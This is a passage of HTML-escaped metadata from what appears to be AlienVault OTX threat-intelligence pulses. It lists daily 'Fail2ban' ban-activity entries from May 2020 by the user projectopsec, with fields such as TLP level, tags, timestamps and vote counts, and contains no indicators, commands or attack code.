;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-06-11T23:03:00.134000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'313&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-05-12&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'56d04fa8-75b9-43c4-9396-0312786fe541',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-05-11T23:05:03.170000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'Previous&nbsp;24&nbsp;hours&nbsp;fail2ban&nbsp;Ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'activity&nbsp;from&nbsp;a&nbsp;GB&nbsp;hosted&nbsp;server',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5eb9da1f14dfe45295357854',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-06-10T23:02:47.886000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'314&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'2020-05-11&nbsp;Fail2ban&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'fd0c74a2-1f1b-4996-abae-6989bf0811d0',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;150,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['fail2ban'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{'TLP':&nbsp;'green',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'adversary':&nbsp;'',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attack_ids':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx.alienvault.com/assets/images/default-avatar.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'83377',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'projectopsec'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs